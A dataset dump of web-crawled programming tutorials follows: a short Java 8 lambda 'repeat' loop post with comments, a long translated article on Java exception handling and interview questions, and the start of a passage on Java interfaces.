text
stringlengths 454
608k
| url
stringlengths 17
896
| dump
stringclasses 91
values | source
stringclasses 1
value | word_count
int64 101
114k
| flesch_reading_ease
float64 50
104
|
|---|---|---|---|---|---|
Java like this:
public class RepeatDemo { public static void main(String[] args) { // One liner repeat repeat(10, () -> System.out.println("HELLO")); // Multi-liners repeat repeat(10, () -> { System.out.println("HELLO"); System.out.println("WORLD"); }); } static void repeat(int n, Runnable r) { for (int i = 0; i < n; i++) r.run(); } }
Probably not as eye pleasing or straight forward as the good fashion for-loop, but you do get rid of the unnecessary loop variable. Only if Java 8 would go extra mile and treat the lambda argument in method with sugar syntax, then we could have it something like the Scala/Groovy style, which makes code more smoother. For example:
// Wouldn't this be nice to have in Java? repeat(10) { System.out.println("HELLO"); System.out.println("WORLD"); }
Hum….
interesting post, thanks…
I created a simple class with Builder pattern that creates a loop with this usage style :
link
public static void main(String[] args) {
loop().from(2).to(10).doIt(() -> System.out.println(“Hello World!”));
}
Hi, unless you do want to get rid of redundant loop variable why not to do it this way:
import static java.util.stream.IntStream.*;
range(1, 5).forEach((i)-> System.out.println(“HELLO”));
|
http://www.javacodegeeks.com/2014/04/creating-your-own-loop-structure-in-java-8-lambda.html
|
CC-MAIN-2014-42
|
refinedweb
| 201
| 51.38
|
Catalog
- Why use exceptions
- Basic definition of exception
- Anomaly system
- Abnormal initial knowledge
- Exceptions and errors
- How to handle exceptions
- “Irresponsible” throws
- Tangled finally
- Throw: a keyword used by JRE
- Exception call chain
- Custom exception
- Abnormal precautions
- When finally meets return
- Java abnormal common interview questions
- Reference articles
- WeChat official account
- Java technology
- Official account number: Huang Xiaoxie
– Java anomaly
This series of articles will be organized into my “Java interview guide” warehouse on GitHub, and more highlights can be found in my warehouse
If you like, please point to star ha
The article started on my personal blog:
This article is one of the WeChat official account Java Java. This part of the content comes from the Internet. In order to make the topic clear and clear, it also integrates many of the content of the technology blog that I think is good, and draws some good blog articles. If there is any infringement, please contact the author.
This series of blog will tell you how to learn the basic knowledge of Java step by step from the beginning to the advanced stage, and then learn the implementation principle behind each java knowledge point, understand the whole Java technology system more completely, and form your own knowledge framework. In order to better summarize and test your learning results, this series of articles will also provide interview questions and reference answers for each knowledge point.
If you have any suggestions or questions, you can also pay attention to the official account of Java. Contact your author and welcome you to participate in the creation and revision of this series of blog posts. What’s what?
Why use exceptions
First of all, we can make it clear that the exception handling mechanism can ensure the robustness of our programs and improve the system availability. Although we don’t particularly like to see it, we can’t help but recognize its position and function.
When there is no exception mechanism, we deal with it as follows: judge whether an exception has occurred through the return value of the function (the return value is usually agreed), and the program calling the function is responsible for checking and analyzing the return value. Although exception problems can be solved, there are several defects in doing so:
1. Easy to confuse. If the return value of – 11111 indicates an exception, what happens when the final result of the program is – 1111?
2. Poor code readability. Confusing the exception handling code with the program code will reduce the readability of the code.
3. Calling functions to analyze exceptions requires programmers to have a deep understanding of library functions.
The exception handling mechanism provided in OO is a powerful way to provide robust code. Using exception mechanism can reduce the complexity of error handling code. If you do not use exception, you must check specific error and handle it in many places in the program.
If you use an exception, you don’t have to check at the method call, because the exception mechanism will ensure that you can catch the error, and you only need to handle the error in one place, that is, in the so-called exception handler.
This approach not only saves code, but also separates the code “outlining what to do during normal execution” from the code “what to do if something goes wrong”. In a word, compared with the previous error handling methods, the exception mechanism makes the reading, writing and debugging of the code more orderly. (from think in Java).
This part is selected from
Basic definition of exception
In think in Java, exceptions are defined as problems that prevent the current method or scope from executing. We must be clear here: the error of exception code to some extent. Although Java has exception handling mechanism, we can’t look at the exception from a “normal” perspective. The reason for the exception handling mechanism is to tell you that there may be or has been an error, your program has an abnormal situation, which may lead to program failure!
So when will an exception occur? Only in your current environment can the program run normally, that is to say, the program can’t solve the problem correctly, then it will jump out of the current environment and throw an exception. After throwing an exception, it does several things first.
First, it uses new to create an exception object, then terminates the program where the exception is generated, and pops up a reference to the exception object from the current environment. The exception handling mechanism takes over the program and starts to find a proper place to continue executing the program, which is the exception handler.
Generally speaking, the exception handling mechanism is that when an exception occurs in a program, it forces the program to stop running, records the exception information and feeds it back to us, so that we can determine whether to handle the exception or not.
Anomaly system
[failed to transfer pictures from the external chain (img-knxcbtk0-1569073569353) (. PNG))
As can be seen from the above figure, throwable is a superclass of all errors and exceptions in the Java language. It has two subclasses: error and exception.
The Java standard library has built in some common exceptions. These classes take throwable as the top-level parent class.
Throwable also derives the error class and exception class.
Error: an instance of the error class and its subclasses represents the error of the JVM itself. Errors cannot be handled by programmers through code, and errors are rare. Therefore, programmers should pay attention to all kinds of exception classes under the branch of which exception is the parent.
Exception: exception and its subclasses represent various unexpected events sent by the program runtime. It can be used by Java exception handling mechanism and is the core of exception handling.
In general, we divide the exception classes into two categories according to the processing requirements of javac.
Unchecked exception: error and runtimeException and their subclasses. When javac compiles, it will not prompt and find such exceptions, and it is not required to handle these exceptions in the program. So if you like, we can write code processing (using try Catch… Finally) such an exception can also not be handled.
For these exceptions, we should fix the code instead of dealing with it through the exception handler. Most of the reasons for such exceptions are due to code writing problems. For example, except 0 error arithmeticexception, wrong cast error ClassCastException, array index out of bounds arrayindexofboundsexception, null object NullPointerException, etc.
Checked exception: exceptions other than error and runtimeException. Javac forces programmers to prepare for such exceptions (using try Catch… Finally or throws). Either catch it with a try catch statement and process it in the method, or throw it with a throws clause declaration, otherwise the compilation will not pass.
Such exceptions are generally caused by the running environment of the program. Because the program may be run in various unknown environments, and the programmer cannot interfere with how the user uses the program he wrote, the programmer should be prepared for such an exception at all times. Such as sqlexception, IOException, classnotfoundexception, etc.
It needs to be clear that check and non check are for javac, so it is easy to understand and distinguish.
This part is from
Abnormal initial knowledge
The exception is raised when executing a function, and the function is called hierarchically, forming a call stack, because as long as a function has an exception, all its callers will be affected by the exception. When these affected functions are output with exception information, an exception tracking stack is formed.
The place where the exception first occurs is called the exception throw point.
Public class exception{ public static void main (String [] args ) { System. Out. Println ("---- welcome to the command line division calculator ----"); CMDCalculate (); } public static void CMDCalculate () { Scanner scan = new Scanner ( System. in ); int num1 = scan .nextInt () ; int num2 = scan .nextInt () ; int result = devide (num1 , num2 ) ; System . out. println( "result:" + result) ; scan .close () ; } public static int devide (int num1, int num2 ){ return num1 / num2 ; } //---- welcome to the command line division calculator---- // 1 // 0 // Exception in thread "main" java.lang.ArithmeticException: / by zero //At com.javase. Exception.devide (exception. Java: 24) //At com.javase. Exception.cmdcalculate (exception. Java: 19) //At com.javase. Exception. Main (exception. Java: 12)
//---- welcome to the command line division calculator---- //.javase. Exception.cmdcalculate (exception. Java: 17) //At com.javase. Exception. Main (exception. Java: 12)
[failed to transfer pictures from the external chain (img-9rquqjqj-1569073569354) (. PNG))
As can be seen from the above example, when the devide function has an exception except 0, the devide function will throw an arithmeticexception exception, so the call to its cmdcalculate function can not be completed normally, so it will also send an exception, and the caller – main of cmdcalculate, because the cmdcalculate throws an exception, also has an exception, so it always backtracks to the bottom of the call stack.
This behavior is called exception bubbling. The purpose of exception bubbling is to find the latest exception handler in the current function or the caller of this function. Since no exception handling mechanism is used in this example, the exception is finally thrown to JRE by the main function, resulting in program termination.
The above code does not use exception handling mechanism, and can also be compiled smoothly, because the two exceptions are non checking exceptions. But the following example must use the exception handling mechanism, because the exception is a check exception.
In the code, I choose to use throws to declare exceptions and let the caller of the function handle possible exceptions. But why only throws IOException? Because FileNotFoundException is a subclass of IOException, which is within the scope of processing.
Exceptions and errors
Here’s an example
//Errors are errors that the JVM can't handle //Exception is a Java defined tool for simplifying error handling and locating errors. Public class errors and errors{ Error error = new Error(); public static void main(String[] args) { throw new Error(); } //The following four exceptions or errors have different handling methods public void error1 (){ //The compile time requires that it must be handled, because this exception is the top-level exception, including the check exception, which must be handled try { throw new Throwable(); } catch (Throwable throwable) { throwable.printStackTrace(); } } //Exception must also be handled. Otherwise, an error is reported, because the check exceptions are inherited from the exception, so they need to be caught by default. public void error2 (){ try { throw new Exception(); } catch (Exception e) { e.printStackTrace(); } } //Error can not be processed and no error is reported when compiling. The reason is that the virtual machine can't handle it at all, so nothing needs to be done public void error3 (){ throw new Error(); } //RuntimeException is known to compile without error public void error4 (){ throw new RuntimeException(); } // Exception in thread "main" java.lang.Error //At com.javase. Exception. Error. Main (error. Java: 11) }
How to handle exceptions
When writing code to handle exceptions, there are two different handling methods for checking exceptions:
Use try… Catch… The finally statement block handles it.
Or, use the throws declaration in the function signature and give it to the function caller to solve it.
Here are some specific examples, including error, exception and throwable
The above example is a run-time exception that does not need to show the catch.
The following example is a checkable exception to show caught or thrown.
@Test public void testException() throws IOException { //FileNotFoundException will be thrown by the constructor of FileInputStream FileInputStream fileIn = new FileInputStream("E:\a.txt"); int word; //The read method throws an IOException while((word = fileIn.read())!=-1) { System.out.print((char)word); } //The close method throws an IOException fileIn.close(); }
Try catch finally
Public class exception handling method{ @Test public void main() { try{ //Try block contains code that may have exceptions. InputStream inputStream = new FileInputStream("a.txt"); //If the try is finished and no exception occurs, then execute the finally block and the code after finally (if any). int i = 1/0; //If an exception occurs, try to match the catch block. throw new SQLException(); //Using 1.8 JDK to catch multiple exceptions at the same time, runtimeException can also catch. Only the virtual machine cannot process after capture, so capture is not recommended. }catch(SQLException | IOException | ArrayIndexOutOfBoundsException exception){ System.out.println(exception.getMessage()); //Each catch block is used to catch and handle a specific exception, or subclass of this exception type. Multiple exceptions can be declared in a catch in Java 7. //The parentheses after catch define the exception type and exception parameters. If the exception matches and is the first one, the virtual machine will use this catch block to handle the exception. //In the catch block, you can use the exception parameter of this block to get the information about the exception. The exception parameter is a local variable in this catch block, which cannot be accessed by other blocks. //If the exception in the current try block is not caught in all subsequent catches, execute finally first, and then match the exception handler in the external caller of this function. //If no exception occurs in try, all catch blocks are ignored. }catch(Exception exception){ System.out.println(exception.getMessage()); //... }finally{ //Finally blocks are usually optional. //Finally executes whether the exception occurs or not, whether the exception matches and is handled. //Finally, it mainly does some cleaning work, such as closing the flow, closing the database connection, etc. }
A try must have at least one catch or finally
try { int i = 1; }finally { //A try must have at least one catch block, otherwise, at least one finally block. But finally is not used to handle exceptions. Finally does not catch exceptions. } }
When an exception occurs, the code behind the method does not run, even if the exception has been caught. Here is a strange example. Try catch finally again in catch
@Test public void test() { try { throwE(); System. Out. Println ("I threw an exception earlier"); System. Out. Println ("I won't do it anymore"); } catch (StringIndexOutOfBoundsException e) { System.out.println(e.getCause()); }catch (Exception ex) { //Try catch finally can still be used in a catch block try { throw new Exception(); }catch (Exception ee) { }finally { System. Out. Println ("my catch block has not been executed, and I will not execute it"); } } } //Exceptions thrown in a method declaration must be handled by the calling method or continue to be thrown up, //When throwing to JRE, the termination program cannot be processed public void throwE (){ // Socket socket = new Socket("127.0.0.1", 80); //When an exception is thrown manually, no error will be reported, but the method calling the method needs to handle the exception, otherwise an error will occur. // java.lang.StringIndexOutOfBoundsException //At com.javase. Exception. Throw (exception handling. Java: 75) //At com.javase. Exception. Exception handling method. Test (exception handling method. Java: 62) throw new StringIndexOutOfBoundsException(); }
In fact, some languages can continue to run after encountering exceptions
In some programming languages, when an exception is handled, the control flow will recover to the exception throwing point and then execute. This strategy is called: recovery model of exception handling
In Java, the execution flow is restored to the catch block that handles the exception and then executed. This strategy is called: termination model of exception handling
“Irresponsible” throws
Throws is another way to handle exceptions, which is different from try Catch… Finally, throws simply declares the possible exceptions in the function to the caller, but does not handle them specifically.
The reason for this exception handling may be that the method itself does not know how to handle such an exception, or let the caller handle it better, and the caller needs to be responsible for the possible exception.
public void foo() throws ExceptionType1 , ExceptionType2 ,ExceptionTypeN { //Exception objects of exceptiontype1, exceptiontype2, exceptiontypen or their subclasses can be thrown inside foo. }
Tangled finally
Finally block, no matter whether the exception occurs or not, as long as the corresponding try is executed, it must also execute. There is only one way to keep a finally block from executing: system. Exit(). So finally block is usually used to release resources: close files, close database connections and so on.
A good programming habit is to open resources in the try block and clean up and release them in the finally block.
What should be noted:
1. Finally blocks do not have the ability to handle exceptions. Only catch blocks can handle exceptions.
2. In the same try Catch… In the finally block, if an exception is thrown in try and there is a matching catch block, execute the catch block first, and then execute the finally block. If there is no catch block match, perform finally first, and then go to the external caller to find the appropriate catch block.
3. In the same try Catch… In the finally block, if an exception occurs in try and an exception is thrown when handling the exception in the matching catch block, then the next finally block will execute: first execute the finally block, and then go to the peripheral callers to find the appropriate catch block.
Public class finally{ public static void main(String[] args) { try { throw new IllegalAccessException(); }catch (IllegalAccessException e) { // throw new Throwable(); //If an exception is thrown again at this time, finally cannot be executed and only an error can be reported. //Finally, it will be executed at any time //Unless I show the call. Finally will not execute at this time System.exit(0); }finally { System. Out. Println ("calculate your ruthlessness"); } } }
Throw: a keyword used by JRE
throw exceptionObject
The programmer can also manually and explicitly throw an exception through the throw statement. The throw statement must be followed by an exception object.
Throw statement must be written in the function. The place where throw statement is executed is an exception throw point, = = which is no different from the exception throw point automatically formed by JRE. = =
public void save(User user) { if(user == null) Throw new illegalargumentexception ("user object is empty"); //...... }
Most of the following are excerpted from
This article is written in a very meticulous and admirable way. It is the most detailed article I have seen for it at present. It can be said that it stands on the shoulders of giants.
Exception call chain
Abnormal chaining
In some large, modular software development, once an exception occurs in a place, it will lead to a series of exceptions, just like the domino effect. Suppose that module B needs to call the method of module a to complete its own logic. If there is an exception in module a, then module B will fail to complete and an exception will occur.
==However, when B throws an exception, it will cover up the exception information of a, which will cause the source information of the exception to be lost. The chaining of exceptions can connect the exceptions of multiple modules in series, so that the exception information will not be lost. = =
Exception Chaining: construct a new exception object with an exception object as a parameter. The new object will contain information about the previous exception. This technology is mainly implemented by a function with throwable parameter of exception class. This is a parameter exception. We call it cause.
Looking at the throwable class source code, you can see that there is a throwable field cause, which saves the source exception parameters passed during construction. This design is the same as the node class design of the list, so it is natural to form a chain.
public class Throwable implements Serializable { private Throwable cause = this; public Throwable(String message, Throwable cause) { fillInStackTrace(); detailMessage = message; this.cause = cause; } public Throwable(Throwable cause) { fillInStackTrace(); detailMessage = (cause==null ? null : cause.toString()); this.cause = cause; } //........ }
Let’s look at a real example of abnormal chain
Public class exception chain{ @Test public void test() { C(); } public void A () throws Exception { try { int i = 1; i = i / 0; //When I comment out this line of code and use method B to throw an error, the result is as follows //April 27, 2018 10:12:30 PM org.junit.platform.launcher.core.serviceloadertestengineregistry loadtestengines //Information: discovered testengines with IDS: [JUnit Jupiter] //Java. Lang. error: B also made a mistake //At com.javase. Exception. Exception chain. B (exception chain. Java: 33) //At com.javase. Exception. Exception chain. C (exception chain. Java: 38) //At com.javase. Exception. Exception chain. Test (exception chain. Java: 13) // at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) // Caused by: java.lang.Error //At com.javase. Exception. Exception chain. B (exception chain. Java: 29) }catch (ArithmeticException e) { //Here, the lowest level exception is repackaged and thrown through the construction method of throwable class, at this time, the information of method a is injected. At last, when printing stack information, you can see the caused by Exception of method a. //If it is thrown directly, the stack information printing result can only see the error information of the upper method, but not the error of A. //So it needs to be packaged and thrown Throw new exception ("a method calculation error", e); } } public void B () throws Exception,Error { try { //Exception received from a, A(); throw new Error(); }catch (Exception e) { throw e; }catch (Error error) { Throw new error ("B also made a mistake", error); } } public void C () { try { B(); }catch (Exception | Error e) { e.printStackTrace(); } } //Final results //Java.lang.exception: a method calculation error //At com.javase. Exception. Exception chain. A (exception chain. Java: 18) //At com.javase. Exception. Exception chain. B (exception chain. Java: 24) //At com.javase. Exception. Exception chain. C (exception chain. Java: 31) //At com.javase. Exception. Exception chain. Test (exception chain. Java: 11) // ellipsis // Caused by: java.lang.ArithmeticException: / by zero //At com.javase. Exception. Exception chain. A (exception chain. Java: 16) // ... 31 more }
Custom exception
If you want to customize exception classes, you can extend exception classes. Therefore, such custom exceptions belong to checked exception. If you want to customize non checking exceptions, extend from runtimeException.
According to international conventions, custom exceptions should always contain the following constructors:
A parameterless constructor
A constructor with a string parameter and passed to the constructor of the parent class.
A string parameter and throwable parameter are passed to the parent constructor
A constructor with throwable parameter and passed to the constructor of the parent class.
The following is the complete source code of IOException class, which can be used for reference.
public class IOException extends Exception { static final long serialVersionUID = 7818375828146090155L; public IOException() { super(); } public IOException(String message) { super(message); } public IOException(String message, Throwable cause) { super(message, cause); } public IOException(Throwable cause) { super(cause); } }
Abnormal precautions
Abnormal precautions
When a subclass overrides a function with a throws declaration of its parent class, the exceptions declared by its throws declaration must be within the control of the parent class exception — the exception handler used to handle the throws method of the parent class, and must also be applicable to the throws method of the subclass. This is to support polymorphism.
For example, if the parent method throws has two exceptions, the child cannot throw three or more exceptions. If the parent class throws IOException, the child class must throw IOException or the child class of IOException.
As for why? I think, maybe the following example can illustrate.
class Father { public void start() throws IOException { throw new IOException(); } } class Son extends Father { public void start() throws Exception { throw new SQLException(); } }
/**********************Suppose the above code is allowed (wrong in essence)***********************/
class Test { public static void main(String[] args) { Father[] objs = new Father[2]; objs[0] = new Father(); objs[1] = new Son(); for(Father obj:objs) { //Because the essence thrown by the son class is sqlexception, which cannot be handled by IOException. //So try here.. Catch cannot handle exceptions in son. //Polymorphism cannot be achieved. try { obj.start(); }catch(IOException) { //Handle IOException } } } }
==Java’s exception execution process is thread independent, and there is no impact between threads==
Java programs can be multithreaded. Each thread is an independent execution flow, independent function call stack. If the program has only one thread, an exception that is not handled by any code will cause the program to terminate. If it is multithreaded, an exception that is not handled by any code will only cause the thread where the exception is located to end.
In other words, exceptions in Java are thread independent. The problem of threads should be solved by the threads themselves, instead of being delegated to the outside, and will not directly affect the execution of other threads.
Here’s an example
Public class multithreaded exception{ @Test public void test() { go(); } public void go () { ExecutorService executorService = Executors.newFixedThreadPool(3); for (int i = 0;i <= 2;i ++) { int finalI = i; try { Thread.sleep(2000); } catch (InterruptedException e) { e.printStackTrace(); } executorService.execute(new Runnable() { @Override //The exception thrown by each thread will not affect the execution of other threads public void run() { try { System.out.println("start thread" + finalI); throw new Exception(); }catch (Exception e) { System.out.println("thread" + finalI + " go wrong"); } } }); } //Results: // start thread0 // thread0 go wrong // start thread1 // thread1 go wrong // start thread2 // thread2 go wrong } }
When finally meets return
First, a fact that is not easy to understand:
In the try block, even if there are return, break, continue and other statements that change the execution flow, finally will execute.
public static void main(String[] args) { int re = bar(); System.out.println(re); } private static int bar() { try{ return 5; } finally{ System.out.println("finally"); } } / * output: finally */
Many people are always summing up the order and law of execution when facing this problem, but I think it is still difficult to understand. I summed up a method myself. Use the following GIF chart to illustrate.
[failed to transfer pictures from the external chain (img-scef4t85-1569073569354) (. GIF))
That is to say, try Catch… As long as the return in finally can be executed, it will be executed. They write the return value to the same memory address (assuming the address is 0 × 80). The data executed later will cover the data executed first, and the return value obtained by the caller is the last one written. Then, according to this idea, the following example is not difficult to understand.
Return in finally overrides the return value in try or catch.
public static void main(String[] args) { int result; result = foo(); System.out.println(result); /////////2 result = bar(); System.out.println(result); /////////2 } @SuppressWarnings("finally") public static int foo() { trz{ int a = 5 / 0; } catch (Exception e){ return 1; } finally{ return 2; } } @SuppressWarnings("finally") public static int bar() { try { return 1; }finally { return 2; } }
Return in finally suppresses (destroys) the exception in the previous try or catch block
class TestException { public static void main(String[] args) { int result; try{ result = foo(); System. Out. Println (result); // output 100 } catch (Exception e){ System. Out. Println (e.getmessage()); // no exception caught } try{ result = bar(); System. Out. Println (result); // output 100 } catch (Exception e){ System. Out. Println (e.getmessage()); // no exception caught } } //Exception suppressed in catch @SuppressWarnings("finally") public static int foo() throws Exception { try { int a = 5/0; return 1; }catch(ArithmeticException amExp) { Throw new exception ("I will be ignored because return is used in finally below"); }finally { return 100; } } //Exceptions in try are suppressed @SuppressWarnings("finally") public static int bar() throws Exception { try { int a = 5/0; return 1; }finally { return 100; } } }
The exception in finally will overwrite (destroy) the exception in the previous try or catch
class TestException { public static void main(String[] args) { int result; try{ result = foo(); } catch (Exception e){ System. Out. Println (e.getmessage()); // output: I am exception in final } try{ result = bar(); } catch (Exception e){ System. Out. Println (e.getmessage()); // output: I am exception in final } } //Exception suppressed in catch @SuppressWarnings("finally") public static int foo() throws Exception { try { int a = 5/0; return 1; }catch(ArithmeticException amExp) { Throw new exception ("I'll be ignored because a new exception is thrown in finally below"); }finally { Throw new exception ("I'm an exception in finally"); } } //Exceptions in try are suppressed @SuppressWarnings("finally") public static int bar() throws Exception { try { int a = 5/0; return 1; }finally { Throw new exception ("I'm an exception in finally"); } } }
The above three examples are different from ordinary people’s coding thinking, so I suggest:
Do not use return in fill.
Do not throw an exception in finally.
Lighten the task of finally. Don’t do anything else in finally. It’s most appropriate that finally block is only used to release resources.
Try to write all return at the end of the function instead of try Catch… Finally.
Java abnormal common interview questions
Here is my personal summary of the knowledge about exception and error that Java and J2EE developers are often asked in interviews. When sharing my answers, I also made quick revisions to these questions and provided source code for in-depth understanding. I summarized all kinds of difficult problems, suitable for novice code farmers and advanced Java code farmers. If you encounter a problem that I don’t have in my list, and this problem is very good, please share it in the comments below. You can also share in the comments about your interview mistakes.
1) What is exception in Java?
This question is often asked for the first time when it comes to exceptions or when interviewing rookies. I’ve never met a senior or senior engineer who asked about this, but I’m very willing to ask about it for novices. In short, exceptions are the way Java communicates system and program errors to you. In Java, exception functions are implemented through classes such as throwable, exception and runtimeException, and then there are keywords for handling exceptions, such as throw, throws, try, catch and finally. All exceptions are derived from throwable. Throwable further divides errors into java.lang.exception
And java.lang.error. Java.lang.error are used to handle system errors, such as java.lang.stackoverflowerror. Exception is then used to handle program errors, requested resources are not available, and so on.
2) What’s the difference between checked and unchecked exceptions in Java?
This is a very popular Java exception interview question, which will appear in various levels of Java interview. The main difference between checking and non checking exceptions lies in the way they are handled. Check exceptions need to be handled at compile time with try, catch and finally keywords, otherwise the compiler will report an error. This is not necessary for non checking exceptions. In Java, all exceptions inherited from the java.lang.exception class are check exceptions, and all exceptions inherited from the runtimeException are called non check exceptions.
3) What are the similarities between NullPointerException and arrayindexoutofboundexeption in Java?
This is not a very popular problem in Java exception interview, but it will appear in different levels of novice interview to test whether the candidates are familiar with the concepts of check exception and non check exception. By the way, the answer to this question is that both of these exceptions are non checking exceptions and inherit from runtimeException. This problem may lead to another problem, that is, what is the difference between Java and C arrays, because there is no size limit for the arrays in C, and arrayindexoutofboundexception will never be thrown.
4) What are the best practices you follow in Java exception handling?
This question is very common in interviewing technical managers. Because exception handling is very important in project design, it is necessary to master exception handling. There are many best practices for exception handling, which are listed below to improve the robustness and flexibility of your code:
1) The Boolean value is returned instead of null when the method is called, which can be NullPointerException. Because null pointer is the most disgusting exception in Java
2) Don’t leave the code in the catch block. An empty catch block is an error event in exception handling because it just catches the exception without any handling or prompting. Usually you should at least print out the abnormal information, of course, you’d better deal with the abnormal information according to your needs.
3) If you can throw a checked exception, try not to throw a checked exception. By removing duplicate exception handling code, the readability of the code can be improved.
4) Never let your database related exceptions appear to the client. Because most database and sqlexception exceptions are controlled exceptions, in Java, you should handle the exception information in Dao layer, and then return the handled exception information that can be understood by users and corrected according to the exception prompt information.
5) in Java, we must call the close () method in the finally block after database connection, database query and stream processing.
5) Since we can use runtimeException to handle errors, why do you think there are check exceptions in Java?
This is a controversial question and you should be careful when answering it. Although they would like to hear your opinion, they are most interested in persuasive reasons. I think one of the reasons is that the existence of checking exceptions is a design decision, influenced by experience in programming languages such as C + + that are older than Java. The vast majority of checked exceptions are in the Java. IO package, which makes sense, because when you request a non-existent system resource, a strong program must be able to handle this situation gracefully. By declaring IOException as a check exception, Java ensures that you can handle exceptions gracefully. Another possible reason is to use catch or finally to ensure that a limited number of system resources (such as file descriptors) are released as early as possible after you use them. Joshua
This topic is involved in several parts of the effective java book written by Bloch, which is worth reading.
6) What’s the difference between throw and throws in Java?
An interview question that a JAVA beginner should master. Throw and throws look very similar at first glance, especially when you are a JAVA beginner. Although they look similar, they are used to handle exceptions. But in the code, the use method and the place are different. Throws always appear in a function header to indicate various exceptions that may be thrown by the member function. You can also declare unchecked exceptions, but this is not enforced by the compiler. If the method throws an exception, you need to handle the exception when calling the method. Another keyword, throw, is used to throw any exception. According to the syntax, you can throw any throwable (i.e. throwable
Throw can interrupt program operation, so it can be used instead of return. The most common example is to throw unsupported operationexception code in an empty method where return is required as follows:
You can see more differences between these two keywords in Java in this article.
7) What is “abnormal chain”?
“Exception chain” is a very popular concept of exception handling in Java. It means that an exception is thrown when an exception is handled, resulting in an exception chain. This technology is mostly used to encapsulate checked exception into unchecked exception or runtimeException. By the way, if you decide to throw a new exception because of the exception, you must include the original exception, so that the handler can access the final source of the exception through the getcause() and initcause() methods.
)Have you ever custom implemented exceptions? How do you write it?
Obviously, most of us have written custom or business exceptions, such as accountnotfoundexception. The main reason to ask about this Java exception during the interview is to find out how you use this feature. This can handle exceptions more accurately and delicately. Of course, it is closely related to whether you choose checked or unchecked exception. By creating a specific exception for each specific situation, you provide a better choice for the caller to handle the exception better. I prefer more precise exceptions than general exceptions. Creating a large number of custom exceptions will increase the number of project classes, so maintaining a balance between custom exceptions and general exceptions is the key to success.
9) What changes have been made to exception handling in JDK7?
This is a new Java exception handling interview question. There are two new features for error and exception handling in JDK7. One is that multiple exceptions can be generated in one catch block, just like multiple catch blocks. The other is automated resource management (ARM), also known as the try with resource block. These two features can reduce the amount of code and improve the readability of code when handling exceptions. Understanding these features will not only help developers write better exception handling code, but also make you more prominent in the interview. I recommend you read the Java 7 introduction, so that you can have a deeper understanding of these two very useful features.
10) Have you ever encountered outofmemoryerror? How did you handle it?
This interview question will be used when interviewing senior programmers. The interviewer wants to know how you deal with this dangerous outofmemoryerror. It must be admitted that no matter what project you do, you will encounter this problem. So if you say you haven’t, the interviewer won’t buy it. If you are not familiar with this problem, or even have not encountered it, and you have 3 or 4 years of Java experience, then be ready to deal with it. While answering this question, you can also take the opportunity to show off your awesome skills in dealing with memory leaks, tuning, and debugging. I find that people who master these skills can make a deep impression on the interviewer.
11) If the method returns the result before executing the finally block, or the JVM exits, will the code in the finally block still execute?
This question can also be asked in another way: “if you call System.exit () in try or finally, what will the result be?” Knowing how to execute a finally block, even if you have used return to return results in try, is very valuable for understanding Java exception handling. The code in the finally block will not execute only if there is system. Exit (0) in try to exit the JVM.
12) The difference of final, finalize and finally keywords in Java
This is a classic java interview question. A friend of mine asked this question when he recruited core Java developers for Morgan Stanley in telecommunications. Final and finally are Java keywords, while finalize is the method. The final keyword is very useful when creating immutable classes, except to declare that the class is final. The finalize () method is the garbage collector calling before recovering an object, but there is no guarantee that this method will be called in the Java specification. Finally keyword is only keyword related to exception handling discussed in this article. In your product code, you must use the finally block when closing the connection and resource files.
Reference articles
WeChat official account
Java technology
If you want to pay attention to my updated articles and dry cargo, you can pay attention to my official account, Java technology, a technical station of Ali Java engineer, author Huang Xiaoxie, focusing on Java Related technologies: SSM, springboot, mysql, distributed, middleware, cluster, Linux, network, multithreading, occasionally talking about docker and elk, but also sharing technology dry goods and learning experience, committed to Java full stack development!
Necessary learning resources for Java Engineers:Some Java engineers often learn resources, pay attention to the official account, and respond to the background keywords.“Java”You can get it for free.
Official account number: Huang Xiaoxie
The author is a 985 master, ant financial JAVA engineer, focusing on the JAVA back-end technology stack: SpringBoot, MySQL, distributed, middleware, microservices, but also understand the investment and financial management, occasionally speak about the algorithm and computer theoretical basis, adhere to learning and writing, believe in the power of lifelong learning!
Programmer 3T technology learning resources:Some programmers learn the resources of the technology package, after the official account, the background reply key words.“Information”You can get it for free.
|
https://developpaper.com/solid-java-foundation-series-10-deep-understanding-of-java-exception-system/
|
CC-MAIN-2020-16
|
refinedweb
| 6,714
| 53.41
|
A cache when writing files over the network.. Currently the write cache system is used by the classes TNetFile, TXNetFile and TWebFile (via TFile::WriteBuffers()).
The write cache is automatically created when writing a remote file (created in TFile::Open()).
Definition at line 19 of file TFileCacheWrite.h.
#include <TFileCacheWrite.h>
Default Constructor.
Definition at line 37 of file TFileCacheWrite.cxx.
Creates a TFileCacheWrite data structure.
The write cache will be connected to file. The size of the cache will be buffersize, if buffersize < 10000 a default size of 512 Kbytes is used
Definition at line 53 of file TFileCacheWrite.cxx.
Destructor.
Definition at line 70 of file TFileCacheWrite.cxx.
Flush the current write buffer to the file.
Returns kTRUE in case of error.
Definition at line 79 of file TFileCacheWrite.cxx.
Definition at line 38 of file TFileCacheWrite.h.
Print class internal structure.
Reimplemented from TObject.
Definition at line 94 of file TFileCacheWrite.cxx.
Called by the read cache to check if the requested data is not in the write cache buffer.
Returns -1 if data not in write cache, 0 otherwise.
Definition at line 108 of file TFileCacheWrite.cxx.
Set the file using this cache.
Any write not yet flushed will be lost.
Definition at line 153 of file TFileCacheWrite.cxx.
Write buffer at position pos in the write buffer.
The function returns 1 if the buffer has been successfully entered into the write buffer. The function returns 0 in case WriteBuffer() was recusively called via Flush(). The function returns -1 in case of error.
Definition at line 121 of file TFileCacheWrite.cxx.
[fBufferSize] buffer of contiguous prefetched blocks
Definition at line 26 of file TFileCacheWrite.h.
Allocated size of fBuffer.
Definition at line 23 of file TFileCacheWrite.h.
Pointer to file.
Definition at line 25 of file TFileCacheWrite.h.
Total size of cached blocks.
Definition at line 24 of file TFileCacheWrite.h.
flag to avoid recursive calls
Definition at line 27 of file TFileCacheWrite.h.
Seek value of first block in cache.
Definition at line 22 of file TFileCacheWrite.h.
|
https://root.cern/doc/master/classTFileCacheWrite.html
|
CC-MAIN-2021-17
|
refinedweb
| 343
| 71.31
|
An
interface in Java defines a reference type to create an abstract concept.
The interface is implemented by classes to provide an implementation of the concept.
Prior to Java 8, an interface could contain only abstract methods. Java 8 allows an interface to have static and default methods with implementation.
Interfaces define a relationship between unrelated classes through the abstract concept.
For example, we can create a Person class to represent a person and we can create a Dog class to represent a dog.
